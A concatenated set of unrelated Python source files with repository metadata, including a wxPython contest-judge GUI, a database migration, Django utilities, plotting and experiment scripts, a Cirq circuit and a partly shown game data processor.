self.SetTitle(self._Title + " -- %s" % self.con.GetTitle())
else:
self.SetTitle(self._Title)
self.statusbar.SetStatusText("Free")
def OnOpenReport(self,event):
if not self.con : return
report_file = self.con.GetPath() + r'/' + rpc.PATH_D_RESULT + r"/" + rpc.PATH_F_EXRESULT
if not os.path.isfile(report_file):
PError(self,"No report file!")
return
import webbrowser
webbrowser.open("file://"+report_file)
def OnExportHtml(self,event):
if self.con == None: return
try:
self.AddRuntimeInfo("Export report html for Contest - %s\n" % self.con.GetTitle())
self.con.Export(
flag_ForceExport = self.flag_ForceExport,
flag_Merge = self.flag_MergeExport
)
except rpc.RpException,x:
PError(self,x.FormatErrorText())
def OnCheckFastJudge(self,event):
self.workwindow.judge_window.SetFlag_FastJudge(
self.menubar.IsChecked(event.GetId())
)
event.Skip()
def OnCheckOmitJudged(self,event):
self.workwindow.judge_window.SetFlag_OmitJudged(
self.menubar.IsChecked(event.GetId())
)
event.Skip()
def OnCheckForceExport(self,event):
self.flag_ForceExport = self.menubar.IsChecked(event.GetId())
event.Skip()
def OnCheckMergeExport(self,event):
self.flag_MergeExport = self.menubar.IsChecked(event.GetId())
event.Skip()
def TurnOffInfoWindow(self,event):
self.__total_infowindow.Hide(self.infowindow)
event.Skip()
def TurnOnInfoWindow(self,event):
self.__total_infowindow.Show(self.infowindow)
event.Skip()
def OnClearResult(self,event):
if not self.con: return
shutil.rmtree(self.con.GetPath() + r'/' + rpc.PATH_D_RESULT)
self.OnReload(event)
event.Skip()
def OnOpenContest(self,event):
chdialog = wx.FileDialog(
parent=self,
message="Choose A Contest",
defaultDir="~",
wildcard="RPC-ContestFile|*.rpc",
style=wx.OPEN
)
if chdialog.ShowModal() == wx.ID_OK:
filename = chdialog.GetPath()
try:
self.AddRuntimeInfo("Open Contest at : %s\n" % filename)
self.con = rpc.Contest(os.path.dirname(filename),self.OutputHandle)
self.con.LoadrpcFile(os.path.basename(filename))
except rpc.RpException,x:
self.con = None
PError(self,x.FormatErrorText())
self.workwindow.UpdateDisplay(self.con)
self.SetStatus()
chdialog.Destroy()
event.Skip()
def OnQuit(self,event):
if self.con:
self.con.AbortJudge()
self.AddRuntimeInfo("Quit\n")
self.Close()
def OnSaveContest(self,event):
if not self.con:
self.AddRuntimeInfo("No thing to save!\n")
return
self.AddRuntimeInfo("Saving contest ...")
self.con.SaveContest()
self.AddRuntimeInfo("Done\n")
def OnRefresh(self,event):
if not self.con: return
self.SetStatus()
self.workwindow.UpdateDisplay(self.con)
event.Skip()
def OnReload(self,event):
if not self.con: return
self.con.Reload()
self.SetStatus()
self.workwindow.UpdateDisplay(self.con)
event.Skip()
def OnCreateContest(self,event):
chdialog = wx.DirDialog(
parent = self,
message="Choose A Contest Menu",
defaultPath="~"
)
if chdialog.ShowModal() == wx.ID_OK:
self.CreateNewContest(chdialog.GetPath())
self.workwindow.UpdateDisplay(self.con)
self.SetStatus()
chdialog.Destroy()
event.Skip()
def OnAbout(self,event):
info = wx.AboutDialogInfo()
info.Name = app_name
info.SetIcon(self._icon)
info.SetVersion(version)
info.SetCopyright('(C) RapidHere RanttuInc@BunkerHill')
info.AddDeveloper("[email protected]")
info.SetDescription(
"grpcontest:\n"
"grpcontest is the GUI-Frame for rpcontest\n"
"Based on rpcontest kernel %s\n" % rpc.version +
"\n"
"rpcontest:" +
rpc.Description
)
wx.AboutBox(info)
def CreateNewContest(self,path):
path = os.path.abspath(path)
if not os.path.isdir(path + r'/' + D_SRC):
os.makedirs(path + r'/' + rpc.PATH_D_SRC)
if not os.path.isdir(path + r'/' + D_DATA):
os.makedirs(path + r'/' + rpc.PATH_D_DATA)
fp = open(path + r'/' + "auto_create.rpc","w")
fp.write(rpc.RPC_KEY_TITLE + " sample")
fp.write(rpc.RPC_KEY_TASK + "\n" + rpc.RPC_KEY_COMPETITOR + "\n")
fp.close()
for mn in os.listdir(path + r'/' + rpc.PATH_D_DATA):
if os.path.isdir(path + r'/' + rpc.PATH_D_DATA + r'/' + mn) and \
not os.path.isfile(path + r'/' + mn + '.' + rpc.EXT_TYPE_RTC):
fp = open(path + r'/' + mn + '.' + rpc.EXT_TYPR_RTC,"w")
fp.close()
try:
self.AddRuntimeInfo("Create New contest at : %s\n" % path)
self.con = rpc.Contest(path,self.OutputHandle)
self.con.LoadrpcFile("auto_create.rpc")
except RpError,x:
self.con = None
PError(self,x.txt)
def OnHelp(self,event):
self.AddRuntimeInfo("Sorry ... But the help document is empty = =\n")
def CreateOutputHandle(self):
class OutputHandle(rpc.baseOutputHandle):
def __init__(self,Frame):
rpc.baseOutputHandle.__init__(self)
self.Frame = Frame
def PrintWarningInfo(self,Text):
self.Frame.AddRuntimeInfo("Warning : " + Text)
def PrintErrorInfo(self,Text):
PError(self.Frame,Text)
def PrintRuntimeInfo(self,Text):
self.Frame.AddRuntimeInfo(Text + "\n")
def PrintJudgeInfo(self,Indent,Text):
self.Frame.workwindow.judge_window.JudgePanel.AddJudgeInfo(
" " * Indent + Text
)
def Timer(self,Current,Total):
self.Frame.workwindow.judge_window.JudgePanel.UpdateTimer(Current,Total)
def Process(self,Current,Total):
self.Frame.workwindow.judge_window.JudgePanel.UpdateProcess(Current,Total)
def EndJudge(self):
self.Frame.AddRuntimeInfo("="*80 + "Judge Done\n")
self.Frame.workwindow.judge_window.JudgePanel.EndJudge()
self.OutputHandle = OutputHandle(self)
class App(wx.App):
def OnInit(self):
waittime = 3000
bmp = wx.Image(rpc.IPTH + "/boot.png").ConvertToBitmap()
wx.SplashScreen(
bitmap = bmp,
splashStyle = wx.SPLASH_TIMEOUT | wx.SPLASH_CENTRE_ON_SCREEN,
milliseconds = waittime,
parent=None,
id=-1
)
wx.Yield()
self.SetAppName(app_name)
return True
def Start():
app = App()
frame = rpcontest_Frame()
frame.Show()
app.MainLoop()
if __name__ == "__main__":
Start()
|
[
"[email protected]"
] | |
86b41f04464f6255cf2d2a8cd880398100d011ba
|
0f7d51a3253a958e8f0c9dbab3f1afe1fbfeca1e
|
/db_repository/versions/025_migration.py
|
219650371a39505472b3fad4345d5dd985aa80a0
|
[] |
no_license
|
Baakel/KastelEditor
|
d71f7ec69341f629d2be89a2cd374a132677bb47
|
d6af90fbc666877c866fcdfe5877ae730d3cd99c
|
refs/heads/master
| 2023-05-26T02:37:21.234627 | 2020-10-30T17:40:17 | 2020-10-30T17:40:17 | 114,881,347 | 0 | 0 | null | 2023-05-22T23:19:55 | 2017-12-20T11:49:30 |
Python
|
UTF-8
|
Python
| false | false | 1,049 |
py
|
from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
pre_meta = MetaData()
post_meta = MetaData()
hard_goal_storage = Table('hard_goal_storage', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('authenticity', Boolean, default=ColumnDefault(False)),
Column('confidentiality', Boolean, default=ColumnDefault(False)),
Column('integrity', Boolean, default=ColumnDefault(False)),
Column('application', Boolean, default=ColumnDefault(False)),
Column('service', Boolean, default=ColumnDefault(False)),
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['hard_goal_storage'].create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['hard_goal_storage'].drop()
|
[
"[email protected]"
] | |
6706701293cdbce507bac30e11f9f774657847a1
|
3bc910f6f2537e8da5756ec0bc09f8bdf8e20957
|
/status/management/commands/rlm_beat.py
|
9b28d729a43851b3e3b49aa8fad449d4298cc23f
|
[] |
no_license
|
harry-bridge/vectorworks-status
|
179bebb77246166a61e0f71e9d45b04e0d04f909
|
8900e6abc7283a21dec8f8f79731db8dc172c328
|
refs/heads/main
| 2023-05-31T04:29:01.021017 | 2021-06-22T08:54:55 | 2021-06-22T08:54:55 | 375,836,154 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
from django.core.management.base import BaseCommand, CommandError
from django.core import exceptions
from django.conf import settings
from status.rlm_scraper import RLMScrape
class Command(BaseCommand):
help = "Runs the RLM beat task from rlm scraper, this task is usually ran via a cron job"
def handle(self, *args, **options):
RLMScrape().beat_task()
# print("Done")
|
[
"[email protected]"
] | |
6068e0dfbaa8b3e02df630a1f8f2d8551b444403
|
2eaecdb1ed42170463993b8b2285296c5ef2231d
|
/apps/ciudad/admin.py
|
d7e080b95887458bf100d3a8e00e6edfdc8c6041
|
[] |
no_license
|
ivanfdaza/tribunaleclesiasticoIIS
|
9639fc66a2c99baa45b8276f4a1e035bdf294e2e
|
acb164ab8464b71d0461acf03bdd5e3386b57893
|
refs/heads/master
| 2022-11-21T10:32:14.925326 | 2020-07-23T16:21:26 | 2020-07-23T16:21:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 177 |
py
|
from django.contrib import admin
# Register your models here.
from apps.ciudad.models import Ciudad, Departamento
admin.site.register(Ciudad)
admin.site.register(Departamento)
|
[
"[email protected]"
] | |
550f47bd84b8cb4db7e6a30a771dc7247e09d969
|
1be1433af91877966ec17343571252be3807d115
|
/plotters/spars-time-error.py
|
a93bf2f567a2fe21a2f9bc27e92bec44bf0ffd87
|
[] |
no_license
|
beginner1010/script-triangle
|
e298c50db2b5cc476ffe66865417a61b6de135a1
|
88b83980afe7d1d23b76120d17f991282ea29bad
|
refs/heads/master
| 2023-08-22T21:24:35.187888 | 2021-09-26T05:35:27 | 2021-09-26T05:35:27 | 406,838,359 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,068 |
py
|
from settings import *
def exp_range(start, stop, step):
while (start < stop):
yield start
start *= step
return
folder_path = '../output'
output_folder_path = '../plots'
graph_names = ['Journal']
colors = ['teal', 'purple']
alpha= 0.6
width = 1 # size of bars in the plot
lw = 12
for gname in graph_names:
input_file = folder_path + '/' + gname
df_clr = pd.read_csv(input_file + '/' + 'clr-7iter.txt', sep=' ',skipinitialspace=True, names=['time', 'prob', 'error'])
df_edg = pd.read_csv(input_file + '/' + 'edgspars-7iter.txt', sep=' ',skipinitialspace=True, names=['time', 'prob', 'error'])
#df_clr = df_clr[3:]
print(df_clr.head(20), df_edg.head(20))
fig, ax = plt.subplots(figsize=(8, 5))
ax.plot(df_clr['prob'], df_clr['error'], alpha=alpha, color=colors[0], linewidth=lw, marker='o', markersize = 22, markevery=4, linestyle=':', markerfacecolor='deeppink', markeredgecolor='k', solid_capstyle='round', dash_capstyle='round')
ax.plot(df_edg['prob'], df_edg['error'], alpha=alpha, color=colors[1], linewidth=lw, marker='o', markersize = 22, markevery=4, linestyle=':', markerfacecolor='deeppink', markeredgecolor='k', solid_capstyle='round', dash_capstyle='round')
ax.margins(x=0)
#plt.ylim([0.2, 101])
ax.set_ylabel(r'Error(\%)')
ax.set_xlabel('Probability $p$')
ax.set_yticks([0.01, 1.0, 10.0, 100.0])
ax.set_xticks([0.004, 0.016, 0.062, 0.25, 1.0])
plt.yscale('log', basey=10)
#plt.xscale('log', basex=4)
ax.xaxis.set_major_formatter(FormatStrFormatter('%g'))
ax.yaxis.set_major_formatter(FormatStrFormatter('%d'))
# output_path = output_folder_path + '/' + gname + '/'
# if not os.path.exists(output_path):
# os.makedirs(output_path)
#ax.figure.savefig(output_path + '/' + gname + '-spars-error-time.pdf', format='pdf',
# bbox_inches='tight', dpi=400)
plt.show()
time.sleep(1)
plt.close("all")
|
[
"[email protected]"
] | |
d1dc906d5d4c502b2a273b95d457c4b8d5bbb228
|
dd100eb3fb4302d0269bc20e351fb8b668fe2f0b
|
/PyBank/main.py
|
07f7051db289cc12fa04a8ab291f911e2cc6a13b
|
[] |
no_license
|
emieeb/python-challenge
|
1f1f7ad4017860edc9e0225dc54a81207b37698a
|
4913c9c1378245e7155d7e6bac3f6a81a1e760e8
|
refs/heads/master
| 2020-04-03T01:03:17.822701 | 2018-10-27T06:31:35 | 2018-10-27T06:31:35 | 154,917,888 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# Module for reading CSV files
import os
import csv
# Set path for file
pybank_csv = os.path.join("..", "Resources", "budget_data.csv")
# Total of months
def months()
pybank_csv = sum("month")
# Total net amount of "Profit/Losses"
pybank_csv = sum("profit", "losses")
# The Average change in "Profit/Losses" between months
def average("Profit"):
length = len(numbers)
def average("losses")
# The greates increase in profits (date and amount)
# The greatest decrease in losses (date and amount)
|
[
"[email protected]"
] | |
f67f8da1dbcd1d8e7b3087e0c2f1e56c14757ab9
|
6fc350b28a535e23c6bdbb079dfec8fe405bfbc7
|
/test_label_speed.py
|
0bb0c15a5749413196d2a0fd9d4bdcb1b311bdca
|
[] |
no_license
|
dieuwkehupkes/Thesis
|
ab43ae4382fdbaae6f95f05cbf06b9c38861e86d
|
6702f65aa2249285824aa5102ae24a0508e0bce2
|
refs/heads/master
| 2016-09-05T21:08:09.736730 | 2013-11-28T08:11:27 | 2013-11-28T08:11:27 | 10,358,841 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 603 |
py
|
from labelling import *
from file_processing import *
import sys
import time
alignments =sys.argv[1]
sentences = sys.argv[2]
dependencies = sys.argv[3]
f = ProcessDependencies(alignments, sentences, dependencies)
new = f.next()
total = 0
while new:
sentence = new[1].split()
if len(sentence) < 40:
dependencies = Dependencies(new[2],new[1])
l = Labels(dependencies.dependency_labels())
t1 = time.time()
labels = l.label_most
t2 = time.time()
labelling_time = t2-t1
print 'labelling time:', labelling_time
total += labelling_time
new = f.next()
print 'total labelling time:', total
|
[
"[email protected]"
] | |
8b7e8df6bfc87e759bc5f3ade6411eea745c6f08
|
6ada628cc386b6aed52c0f25ca27c459f4c70e5d
|
/src/unittest/python/picasadb_tests.py
|
dd022929a94b9f8e17fc349bf415621de8ea9c22
|
[] |
no_license
|
arnehilmann/photolib
|
dca92d6382395673214d042481e57e79a2e5d88a
|
0712b631eaeedcd3dd71e6c84beacaeb24bd88a5
|
refs/heads/master
| 2021-01-22T11:55:17.203982 | 2016-10-04T13:21:16 | 2016-10-04T13:21:16 | 15,698,842 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,801 |
py
|
import unittest
from mock import patch, mock_open
from photolib.picasadb import PicasaDb
class PicasaDbTest(unittest.TestCase):
def test_find_contacts_file(self):
with patch("os.path.expanduser", return_value="src/resources"):
pdb = PicasaDb(["src/resources/testsamples"])
self.assertEqual(pdb.id2person["d920"], "foo")
def test_build_db(self):
with patch("photolib.picasadb.PicasaDb._find_contacts_file",
return_value="src/resources/testsamples/contacts.xml"):
pdb = PicasaDb(["src/resources/testsamples"])
pdb.build_db()
def test_store_and_read_database(self):
with patch("photolib.picasadb.PicasaDb._find_contacts_file",
return_value="src/resources/testsamples/contacts.xml"):
pdb = PicasaDb(["src/resources/testsamples"])
pdb.build_db()
m = mock_open()
with patch("__builtin__.open", m, create=True):
pdb.store_db("/...invalid.filename...")
m.assert_called_once_with("/...invalid.filename...", "w")
m = mock_open()
with patch("__builtin__.open", m, create=True):
pdb.import_db("/...invalid.filename...")
m.assert_called_once_with("/...invalid.filename...")
def test_analyze_faces_string(self):
with patch("photolib.picasadb.PicasaDb._find_contacts_file",
return_value="src/resources/testsamples/contacts.xml"):
pdb = PicasaDb(["src/resources/testsamples"])
for face in pdb.analyze_faces_string("rect64(000800000008000),foo;rect64(67890),bar"):
self.assertEqual(("foo", [0, 0.5, 0.0, 0.5]), face)
break
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
5e65abbff3ad4964ee18fe22613c1cd4d21515d3
|
e6ff4e3cf5c3959b168e19bf069bbdd6b2e49fcb
|
/CORE/fSandController.py
|
37f5f78e66dbb7d80d0ea16cb8cfa3cec38c30e4
|
[] |
no_license
|
spaceuniverse/QLSD
|
0b14a4e323457b9e1a4e8bd75f0afd486687b351
|
2953623d331cb5d4567a2b01bece9a0aba482166
|
refs/heads/master
| 2016-08-08T15:05:51.170426 | 2015-05-08T21:14:26 | 2015-05-08T21:14:26 | 22,347,324 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,831 |
py
|
# ---------------------------------------------------------------------# IMPORTS
import numpy as np
from fSandFun import *
# ---------------------------------------------------------------------# MAIN
class Controll(object):
def __init__(self, actions, features, report=False, rms=False):
self.report = report
# Randon W
#self.W = np.random.rand(len(features), len(actions))
# Zeros W
self.W = np.zeros((len(features), len(actions)))
self.rms = rms
if self.rms:
self.mms = np.ones((len(features), len(actions)))
if self.report:
print self.W.shape
def __wNormalize__(self, wfn): # Could be static
fmax = np.abs(np.max(wfn))
fmin = np.abs(np.min(wfn))
m = np.maximum(fmax, fmin)
if m == 0.0:
m = 1.0
koef = 1.0 / m
wfn = wfn * koef
return wfn
def __updateMms__(self, derivative, act_code):
self.mms[:, act_code] = (self.rms * self.mms[:, act_code] + (1.0 - self.rms) * (derivative ** 2)) * (derivative != 0) + self.rms * (derivative == 0)
self.mms[:, act_code] = np.clip(self.mms[:, act_code], 1e-20, 1e+20)
def __wDecay__(self, weights, decay=1e-5):
#wsum = np.sum(weights ** 2)
#regularize = decay / 2 * wsum
#wsum = np.sum(weights)
regularize = decay * weights
return regularize
def oneStep(self, features):
features = features.reshape(-1, 1)
Q = np.sum(self.W * features, axis=0)
return Q, features
def twoStep(self, features, featuresold, act_code, gamma=0.9):
features = features.reshape(-1, 1)
reward = Rewards.get(features, featuresold)
Q = reward + gamma * np.max(np.sum(self.W * features, axis=0)) # Old np.sum(self.W[:, act_code] * features.T)
if self.report:
print "------------------------ Reward --->", reward
return Q, features
def wUpdate(self, Q1, Q2, F1, act_code, alpha=0.1):
print "Q2 Q1 F1.T", Q2, Q1[act_code], F1.T, F1.T.shape,
regularize = self.__wDecay__(self.W[:, act_code])
print "WD", regularize, regularize.shape
derivative = -(Q2 - Q1[act_code]) * F1.T + regularize
print "DER", derivative, derivative.shape
if self.rms:
self.__updateMms__(derivative, act_code)
updater = derivative / np.sqrt(self.mms[:, act_code])
else:
updater = derivative
self.W[:, act_code] = self.W[:, act_code] - alpha * updater
print "MMS", self.mms[:, act_code]
print "UPDATER", alpha * updater, updater.shape
if self.report:
print "------------------------ Sum(W) --->", np.sum(self.W)
# ---------------------------------------------------------------------#
|
[
"[email protected]"
] | |
3b7426c9a1fc2f829c0acca4d6fd0e9403929b17
|
7eba4f112761d625ff56b4c1270f18fc8534818b
|
/mysite/west/views.py
|
a014c3ed49cb3ea6424f1f8a898c3f52a2320ed3
|
[] |
no_license
|
KillerManK/my_project
|
eb1dd1589b6b8e22144f183014bd435d21d348e3
|
f6ac88e65586ba5a0fdd59f6187b4eb2da1e831a
|
refs/heads/master
| 2021-01-10T16:45:50.894096 | 2016-01-05T02:12:00 | 2016-01-05T02:12:00 | 48,828,178 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 129 |
py
|
# -*- coding: utf-8 -*-
from django.http import HttpResponse
def first_page(request):
return HttpResponse("<p>西餐</p>")
|
[
"[email protected]"
] | |
83d156ab9ebb07eab0942d0dca9e2aceddcd96cb
|
fbc1455b474e3e8ad6c16bcc9d44ed0dcfc480a7
|
/grading/usermanage/management/commands/oauth_setup.py
|
e92f80e7f6bf81fbe915fca8ce4e43848d342021
|
[] |
no_license
|
AlbanyCompSci/grading
|
c2c6affc2609c0e30d135a80f2f1aab5b750ab0e
|
2bf82ffb7f5ce416f166ad74ce4b16891221f1d5
|
refs/heads/master
| 2021-07-13T12:23:26.743195 | 2014-09-12T17:02:33 | 2014-09-12T17:02:33 | 19,794,798 | 0 | 0 | null | 2021-06-29T19:45:04 | 2014-05-14T20:20:21 |
CSS
|
UTF-8
|
Python
| false | false | 870 |
py
|
from django.core.management.base import NoArgsCommand
from django.contrib.sites.models import get_current_site
from allauth.socialaccount.models import SocialApp
import webbrowser
class Command(NoArgsCommand):
help = 'Set up google login'
def handle(self, **options):
webbrowser.open_new_tab('https://console.developers.google.com')
app, app_pre_exists = SocialApp.objects.get_or_create(id=1)
app.provider = 'google'
app.name = 'Grading'
app.client_id = raw_input('Client ID: ')
app.secret = raw_input('Secret Key: ')
app.sites.clear()
site = get_current_site(None)
domain = raw_input('Domain: ')
site.name = domain
site.domain = domain
site.save()
app.sites.add(site)
app.save()
self.stdout.write('Successfully saved %r.' % app.name)
|
[
"[email protected]"
] | |
88be1a8dbca36a3704310ed5d08336575231773d
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/cirq_new/cirq_program/startCirq_pragma263.py
|
bc6b11402b4ca6da63e2f0bf7495b508300d9153
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,624 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=15
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
class Opty(cirq.PointOptimizer):
def optimization_at(
self,
circuit: 'cirq.Circuit',
index: int,
op: 'cirq.Operation'
) -> Optional[cirq.PointOptimizationSummary]:
if (isinstance(op, cirq.ops.GateOperation) and isinstance(op.gate, cirq.CZPowGate)):
return cirq.PointOptimizationSummary(
clear_span=1,
clear_qubits=op.qubits,
new_operations=[
cirq.CZ(*op.qubits),
cirq.X.on_each(*op.qubits),
cirq.X.on_each(*op.qubits),
]
)
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=7
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=5
c.append(cirq.H.on(input_qubit[0])) # number=12
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0])) # number=13
c.append(cirq.H.on(input_qubit[0])) # number=14
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=8
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=9
c.append(cirq.SWAP.on(input_qubit[3],input_qubit[0])) # number=10
c.append(cirq.SWAP.on(input_qubit[3],input_qubit[0])) # number=11
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2820
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_pragma263.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close()
|
[
"[email protected]"
] | |
951d40fc9470783bafcf2b1649073d604e0c09c7
|
567b912ef9e0075b44cd531499ed96e4e58d7638
|
/ini/experiment_binary_left_random.py
|
364b82f2a75ec3a6ca1b11e8c64ac6e29fcc9db6
|
[] |
no_license
|
atpcurr/atpcurr
|
3dbf9f49568c279a789ba0fc9478fa3fb28d83e8
|
0e1c9dcf408718097476d7aa599d557176ed3690
|
refs/heads/master
| 2022-09-17T21:44:52.637017 | 2022-09-07T00:52:08 | 2022-09-07T00:52:08 | 206,651,380 | 3 | 0 | null | 2020-09-25T22:21:44 | 2019-09-05T20:25:54 |
OpenEdge ABL
|
UTF-8
|
Python
| false | false | 3,308 |
py
|
import sys, os
from neptune_utils import simple_handle_experiment
from munch import Munch
base_config = Munch(actions_added=False,
actorbatch=512,
add_repeating_pretraining=False,
add_rnd_steps_to_remain=0,
backend="ocaml",
can_replace_proof=False,
curriculum_allowed=True,
curriculum_decay=0.6,
det_steps=True,
entcoeff=0.01,
episodes_per_problem=1000,
evaldirs=["theorems/robinson_binary/left_random/final"],
evalcount=100,
evaltime=60,
evaltype="prob",
failure_reward=0,
fast_features=False,
feature_file=None,
gamma=0.95,
graph_embedding=False,
graph_embedding_size=40,
graph_hidden_layers=[100,100],
graph_node_count=40,
graph_update_iteration=3,
illegal_reward=0,
known_proof_max_exploration=0,
latent_dim=None,
lr_schedule="constant",
max_exploration=60,
model_type="ppo1",
n_action_slots=22,
n_dim=500,
network_layers=[512,512,512],
optim_batchsize=64,
optim_epochs=4,
optim_stepsize=0.0001,
outdir="results/binary_left_random",
parallel_envs=1,
proof_dir="theorems/robinson_binary/proofs",
quick_progress_percentage=0.9,
saved_model=None,
scheduler_starting_step=1,
scheduler_type="local",
steps_per_curriculum=10000,
supervised_reward=0,
terminate_on_illegal=False,
train_timesteps=[500000],
train_dirs=["theorems/robinson_binary/binary_1m2p1m3__9"],
use_previous_state=True,
use_previous_action=True,
use_action_shuffle=False,
use_mcts=False,
use_remove=False,
use_replay=False,
use_shortest_proof=True,
value_gets_actions=False,
neptune=False,
tags=["binary"])
params_grid = dict()
def spec():
return simple_handle_experiment(experiment_name = 'binary_left_random',
project_name = "deepmath/curriculum-tp",
script='train_ppo.py',
python_path='.:deps/awarelib',
paths_to_dump = '',
exclude = [".git", ".gitignore", ".gitmodules", "log"],
project_tag = "test",
base_config=base_config,
params_grid=params_grid,
_script_name=globals()["script"])
|
[
"[email protected]"
] | |
11b29102ee38f423a7a071ee75faa7c2f7cf7587
|
95e3f38e69bd79b0a338f04c3a4e53b9b7261eb1
|
/lista_4/exercicio_4.py
|
224c077dfe28f7fbc79feef853b76e11f242e4d7
|
[
"MIT"
] |
permissive
|
carlosjrbk/Logica-de-Programa--o---IFPE
|
87fb86caa88a3754c42501c69ac73c02edbf36ec
|
2201f56c5a5641dc33895c2e575983be51d87a86
|
refs/heads/main
| 2023-06-11T03:01:13.151354 | 2021-06-29T02:37:10 | 2021-06-29T02:37:10 | 379,378,279 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
chico = 1.50
ze = 1.10
ano = 0
for cont in range(0,100):
if chico > ze:
chico += 0.02
ze += 0.03
ano += 1
print('será necessario' , ano, 'anos')
|
[
"[email protected]"
] | |
67438a659a2296255acf174988b5cd4e41551121
|
b516490a2ecc9a0238b9e845f4384695e9e4ca83
|
/examples/rotating_square_grating.py
|
609fe6924ad00ca439c57b6ef0aed6c2de33965b
|
[
"MIT"
] |
permissive
|
ClandininLab/flystim
|
97717319a9f08a6bdad9cc4628f07ad10ea9894a
|
9d7af6215eb05f7eef75fe90581bc54f2e2f5aa9
|
refs/heads/master
| 2023-09-01T07:32:47.523874 | 2023-07-12T23:04:51 | 2023-07-12T23:04:51 | 131,910,815 | 2 | 4 |
MIT
| 2023-07-12T23:04:53 | 2018-05-02T22:08:09 |
Python
|
UTF-8
|
Python
| false | false | 915 |
py
|
#!/usr/bin/env python3
from flystim.stim_server import launch_stim_server
from flystim.screen import Screen, SubScreen
from flystim.trajectory import Trajectory
import numpy as np
from flystim.draw import draw_screens
from time import sleep
def main():
stim_duration = 2
iti = 2
screen = Screen(fullscreen=False, server_number=0, id=0, vsync=False)
# draw_screens(screen)
manager = launch_stim_server(screen)
for i in range(2):
manager.load_stim(name='RotatingGrating', rate=60, hold_duration=1, period=60, mean=0.5, contrast=1.0, offset=0.0, profile='square',
color=[1, 1, 1, 1], cylinder_radius=1.1, cylinder_height=10, theta=0, phi=0, angle=0, hold=True)
sleep(iti)
manager.start_stim()
sleep(stim_duration)
manager.stop_stim(print_profile=True)
sleep(iti)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
f736b231f33cffb070a9a4bb88108c52854ef72a
|
19a7959e21d430d6544aa6f8dd511902c83c6e91
|
/实验源代码/red_blue_game/dataProcessor.py
|
5a9519fc44e81658ea071adfa79f967c0f6a2d69
|
[] |
no_license
|
xioajiumi/red_blue_game
|
b6280b07e2fde7ee46180a962e4ad4cc7653d25d
|
ba6d876e8d0375af97010a324a499a5c35251fab
|
refs/heads/main
| 2023-08-31T20:29:57.475151 | 2021-10-20T12:28:10 | 2021-10-20T12:28:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,420 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Site :
# @File : dataProcessor.py
import json
import openpyxl as ox
import matplotlib.pyplot as plt
import numpy as np
import math
def store_2_json(file_name, path, datas):
json_datas = json.dumps(datas)
file = path + file_name
with open(file, "w") as fo:
fo.write(json_datas)
def write_2_excel(file_name, path, datas, render=True):
file_name = path + file_name
# 创建一个表格
wb = ox.Workbook()
wb.create_sheet('datail')
wb.create_sheet('means')
# 把详细数据写入detail表单,把每局平均得分写入means表单
ds = wb.get_sheet_by_name("datail")
ms = wb.get_sheet_by_name("means")
render_data = [] if render else None # 若要渲染则留个后门数据,不用再读取xlsx文件获得数据
# 对两个表单进行预处理
ds.cell(1, 3).value = "最终得分"
for i in range(1, 9): # 写出列表头
ds.cell(1, 2 + 2 * i).value = f"第{i}轮策略"
ds.cell(1, 3 + 2 * i).value = f"第{i}轮损益"
ms.cell(1, 1).value = "第N局"
ms.cell(1, 2).value = "双方总分"
# 循环写入每局数据
for game_num, game_data in datas.items():
ms.cell(1 + game_num, 1).value = f"第{game_num}局" # 写出第几局
ds.cell(2 * game_num, 1).value = f"第{game_num}局" # 写出第几局
